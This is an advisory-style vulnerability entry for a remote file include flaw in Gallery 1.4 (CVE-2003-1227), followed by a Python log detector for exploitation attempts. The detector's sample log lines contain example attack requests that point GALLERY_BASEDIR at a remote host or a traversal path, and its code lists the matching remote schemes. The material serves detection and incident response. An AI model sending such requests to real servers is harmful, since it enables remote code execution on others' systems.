| Field | Value |
|-------|-------|
| VID | 21278 |
| Severity | 40 |
| Port | 80, ... |
| Protocol | TCP |
| Class | CGI |
| Detailed Description | Gallery, a Web-based photo-management application by Bharat Mediratta that runs on any Web server with PHP support, has a remote file include vulnerability in its index.php script. Gallery 1.4 and earlier build the path of an included file from the GALLERY_BASEDIR variable, and a remote attacker can supply that variable as a request parameter (index.php?GALLERY_BASEDIR=...) when the PHP configuration lets request variables populate script globals (register_globals). A specially crafted URL that points GALLERY_BASEDIR at a PHP file on an attacker-controlled host causes the server to fetch and execute that file, giving the attacker arbitrary command execution with the privileges of the Web server process. |
| References | http://archives.neohapsis.com/archives/bugtraq/2003-10/0140.html, http://www.securiteam.com/unixfocus/6S00H0U8KG.html |
| Platforms Affected | Bharat Mediratta Gallery 1.4; Linux, any version |
| Recommendation | Upgrade to Gallery 1.4-pl2 or 1.4.1 or later, available from the Gallery project page on SourceForge: http://sourceforge.net/projects/gallery |
| Related URL | CVE-2003-1227 (CVE) |
| Related URL | 8814 (SecurityFocus) |
| Related URL | 13419 (ISS) |
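Because exploitation of this issue leaves a distinctive artifact in the Web server access log (a GALLERY_BASEDIR query parameter whose value is a remote URL or stream wrapper rather than a local directory), a responder can check historical logs for attempts. The following detector is an added example written for this entry; it is not code from the Gallery project or from the scanner, and the log lines it scans are constructed for illustration. It parses combined-format access log lines, extracts every GALLERY_BASEDIR value case-insensitively (PHP's register_globals does not normalise case, so an attacker may vary it), and flags values that carry a remote scheme, a PHP stream wrapper, or a traversal sequence.

```python
"""Detect remote-file-include attempts against Gallery 1.x via the
GALLERY_BASEDIR request parameter (CVE-2003-1227).

Added example for the vulnerability entry above, not project code.
Input: Apache/nginx combined-format access log lines.
Output: one finding per request whose GALLERY_BASEDIR value points
outside the local install.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Combined log format:
#   ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Prefixes that turn include($GALLERY_BASEDIR . "...") into a remote include
# or a stream-wrapper include.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")


def basedir_values(target: str) -> list:
    """Return every GALLERY_BASEDIR value in the request target, URL-decoded.

    Parameter names are compared case-insensitively: register_globals maps
    ?gallery_basedir= and ?GALLERY_BASEDIR= onto PHP globals the same way.
    """
    query = urlsplit(target).query
    values = []
    for name, vals in parse_qs(query, keep_blank_values=True).items():
        if name.upper() == "GALLERY_BASEDIR":
            values.extend(vals)
    return values


def classify(value: str) -> Optional[str]:
    """Return a reason string if the value is suspicious, else None."""
    v = value.strip().lower()
    if v.startswith(REMOTE_SCHEMES):
        return "remote include: " + value
    if "../" in v or "..\\" in v:
        return "traversal: " + value
    return None


def scan_log(lines) -> list:
    """Scan log lines and return a list of findings (dicts)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        target = m.group("target")
        for value in basedir_values(target):
            reason = classify(value)
            if reason is None:
                continue  # a local relative path such as "./" is normal
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "path": urlsplit(target).path,
                "status": m.group("status"),
                "reason": reason,
            })
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2003:12:00:01 +0000] "GET /gallery/index.php?GALLERY_BASEDIR=http://198.51.100.7/x/ HTTP/1.0" 200 2311 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [10/Oct/2003:12:00:02 +0000] "GET /gallery/index.php?gallery_basedir=%68ttp%3A%2F%2F198.51.100.7%2Fx%2F HTTP/1.0" 200 2311 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [10/Oct/2003:12:00:03 +0000] "GET /gallery/index.php?GALLERY_BASEDIR=../../../../tmp/ HTTP/1.0" 500 0 "-" "curl/7.10"',
    '192.0.2.44 - - [10/Oct/2003:12:00:04 +0000] "GET /gallery/view_album.php?set_albumName=holiday HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2003:12:00:05 +0000] "GET /gallery/index.php?GALLERY_BASEDIR=./ HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The detector is deliberately not limited to index.php: other Gallery 1.x scripts use the same variable, so any request carrying a remote or traversing GALLERY_BASEDIR is worth a look. A 200 response to a remote-include attempt is not proof of compromise on its own (the remote fetch may have failed after the page was served), so treat each finding as a lead to verify against the server's PHP configuration and outbound connections at that time.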